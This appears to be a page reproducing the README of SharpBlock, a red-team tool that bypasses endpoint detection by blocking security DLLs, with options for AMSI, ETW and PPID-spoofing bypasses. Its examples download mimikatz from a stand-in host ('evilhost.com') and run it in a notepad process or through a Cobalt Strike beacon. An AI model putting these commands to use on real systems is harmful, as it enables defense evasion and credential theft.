Home

Awesome

SharpBlock

A method of bypassing EDR's active projection DLL's by preventing entry point execution.

Features

SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x64

  -e, --exe=VALUE            Program to execute (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -n, --name=VALUE           Name of DLL to block
  -c, --copyright=VALUE      Copyright string to block
  -p, --product=VALUE        Product string to block
  -d, --description=VALUE    Description string to block
  -s, --spawn=VALUE          Host process to spawn for swapping with the target exe
  -ppid=VALUE                Parent process ID for spawned child (PPID Spoofing)
  -w, --show                 Show the lauched process window instead of the
                               default hide
      --disable-bypass-amsi  Disable AMSI bypassAmsi
      --disable-bypass-cmdline
                             Disable command line bypass
      --disable-bypass-etw   Disable ETW bypass
      --disable-header-patch Disable process hollow detection bypass
  -h, --help                 Display this help

Examples

Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL

SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL

execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

Note, for the upload_file beacon command, load upload.cna into Cobalt Strike's Script Manager

Accompanying Blog Posts: